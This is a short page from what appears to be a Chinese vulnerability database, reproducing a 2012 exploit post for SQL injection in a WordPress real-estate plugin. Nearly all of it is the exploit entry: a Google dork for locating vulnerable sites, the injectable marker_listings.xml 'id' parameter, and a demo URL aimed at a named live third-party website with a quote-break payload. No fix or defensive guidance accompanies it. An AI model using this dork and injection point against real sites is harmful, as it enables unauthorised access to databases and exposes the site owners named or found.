Wordpress fs-real-estate-plugin Theme SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1046086 漏洞类型
发布时间 2012-11-22 更新时间 2012-11-22
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012110157
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Wordpress fs-real-estate-plugin/ Theme SQL Injection   ((|))
# Google Dork: inurl:/madebymilk/xml/marker_listings.xml          ((|))
# Exploit Author: Novin hack               #
# Category: Web Application                                     #
# Tested on: Windows 7                                          #


#* Location:  http://site.com/wp-content/                       #
#* /plugins/fs-real-estate-plugin/xml/                          #
#* marker_listings.xml?id=?[SQLi]                               #
#* Demo: http://millanenterprises.com/wp-content/plugins/       #
#* fs-real-estate-plugin/xml/marker_listings.xml?id=null'       #


#* Greetz to:            * Arash.F       *                      #